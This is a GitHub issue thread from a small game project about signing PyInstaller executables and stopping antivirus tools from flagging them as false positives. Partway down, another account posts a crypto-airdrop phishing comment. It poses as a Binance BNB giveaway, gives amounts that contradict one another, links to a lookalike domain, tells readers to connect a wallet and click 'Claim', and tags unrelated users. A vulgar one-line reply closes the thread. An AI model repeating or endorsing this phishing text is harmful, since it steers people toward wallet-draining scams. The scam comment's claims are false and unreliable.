### ISSUE TITLE
sign executables

### ISSUE THREAD

**Issue by capalmer1013** [capalmer1013/2d-survival#18]
figure out how to sign executables and set that up

possibly related. figure out how to not have the executables not show up as a virus

**Comment by capalmer1013** [comment]
https://python.plainenglish.io/pyinstaller-exe-false-positive-trojan-virus-resolved-b33842bd3184

**Comment by capalmer1013** [comment]
https://stackoverflow.com/questions/43777106/program-made-with-pyinstaller-now-seen-as-a-trojan-horse-by-avg

might be able to get away with just using `pyinstaller --clean` I hope

**Comment by capalmer1013** [comment]
more medium articles
https://medium.com/@markhank/how-to-stop-your-python-programs-being-seen-as-malware-bfd7eb407a7

**Comment by chasedson** [comment]
# $BNB Airdrop: Claim Your $2000 in BNB Now!

You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://public.bnbstatic.com/image/pgc/202401/1e7c136e591d4cf4e6572503e8629d2c.png)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @MisterOBrien, @iblislin, @jiangplus, @garious, @TheWaWaR, @matheus2740, @broc-dev

**Comment by VV35** [comment]
Why don't you claim some bitches
